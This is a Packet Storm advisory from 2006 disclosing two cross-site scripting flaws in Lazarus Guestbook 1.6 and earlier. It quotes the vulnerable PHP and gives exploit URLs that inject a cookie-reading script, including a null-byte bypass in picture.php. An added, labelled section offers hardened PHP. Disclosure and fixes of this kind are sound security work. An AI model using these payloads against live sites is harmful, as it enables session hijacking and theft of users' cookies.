lazarus16.txt

2006-07-13T00:00:00
ID PACKETSTORM:48227
Type packetstorm
Reporter Simo64 Moroccan Security Team
Modified 2006-07-13T00:00:00

Description

                                        
Product : Lazarus Guestbook  
Website : http://carbonize.co.uk/Lazarus/  
Version : <= 1.6  
Problem : Cross Site Scripting  
  
1)   
The first problem is in lang/codes-english.php: the "show" parameter is not properly sanitised before it is echoed into the page.  
This can be exploited to execute arbitrary HTML and JavaScript code.  
  
Vulnerable code in lang/codes-english.php near line 4  
  
1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
2 <html>  
3 <head>  
4 <title><?php echo($_GET['show']); ?></title>   
  
Exploit :   
  
http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E[XSS]  
http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E<script>alert(document.cookie);</script>  
  
  
2)  
The second problem is in picture.php: the script first verifies that the image file exists,  
and then displays it.  
  
Vulnerable code in picture.php:  
********************************  
  
if (!empty($_GET['img'])) {  
    if (file_exists("$GB_TMP/$_GET[img]")) {  
        $size = @GetImageSize("$GB_TMP/$_GET[img]");  
        $picture = "$GB_PG[base_url]/$GB_TMP/$_GET[img]";  
    }  
...  
<td align="center" valign="middle">  
<?php  
if (!empty($_GET['img']) && is_array($size)) {  
    echo "<a href=\"javascript:window.close()\"><img src=\"$picture\" width=\"$size[0]\" height=\"$size[1]\" border=\"0\"></a>\n";  
}  
?>  
</td>   
  
****************  
If magic_quotes_gpc is OFF, this check can be bypassed by specifying an existing image file (example: "img/home.gif") followed by a null byte (%00).  
  
POC : http://localhost/lazarusgb/picture.php?img=../img/home.gif%00[code]  
  
file_exists("$GB_TMP/$_GET[img]") will return true, because the path is truncated at the null byte, and the HTML code that follows it will be echoed into the page and executed.  
  
Exploit:   
  
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E[XSS]  
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E<script>alert(document.cookie);</script>  
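Hardened versions of the two snippets above, as an added example that is not part of the original advisory or of the Lazarus Guestbook code. The variable names $GB_TMP and $GB_PG are taken from the advisory; gb_safe_title() and gb_safe_picture() are hypothetical helper names, and the example assumes PHP 7.1 or later for the nullable return type.

```php
<?php
// Added example, not the guestbook's own code. $GB_TMP and $GB_PG come from the
// advisory's snippets; gb_safe_title() and gb_safe_picture() are hypothetical names.

// 1) codes-english.php: escape "show" before it lands inside <title>...</title>.
//    htmlspecialchars() renders "</title><script>" as inert text instead of markup.
function gb_safe_title(array $get): string
{
    $show = isset($get['show']) ? (string) $get['show'] : '';
    return htmlspecialchars($show, ENT_QUOTES, 'UTF-8');
}

// 2) picture.php: accept only a bare image file name that resolves inside $GB_TMP,
//    then build the <img> tag from escaped values. Returns null when rejected.
function gb_safe_picture(array $get, string $GB_TMP, array $GB_PG): ?string
{
    if (empty($get['img'])) {
        return null;
    }
    $img = (string) $get['img'];
    // Old PHP builds cut the path at a NUL byte inside file_exists(), so
    // "../img/home.gif%00..." passed the check while the tail reached the HTML.
    // Reject NUL bytes and any directory component outright.
    if (strpos($img, "\0") !== false || basename($img) !== $img) {
        return null;
    }
    if (!preg_match('/^[A-Za-z0-9._-]+\.(gif|jpe?g|png)$/i', $img)) {
        return null;
    }
    // Resolve and confirm the file really lives under $GB_TMP (defeats "..").
    $base = realpath($GB_TMP);
    $path = realpath($GB_TMP . '/' . $img);
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    $size = @getimagesize($path);
    if (!is_array($size)) {
        return null;
    }
    $src = htmlspecialchars($GB_PG['base_url'] . '/' . $GB_TMP . '/' . $img, ENT_QUOTES, 'UTF-8');
    return sprintf(
        '<a href="javascript:window.close()"><img src="%s" width="%d" height="%d" border="0"></a>',
        $src, $size[0], $size[1]
    );
}
```

With these checks the "show" value can no longer close the title element, and the "img" value is reduced to a whitelisted file name whose resolved path must sit under $GB_TMP before any markup is emitted.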
  
Contact : simo64[at]gmail[dot]com  
Moroccan Security Research Team  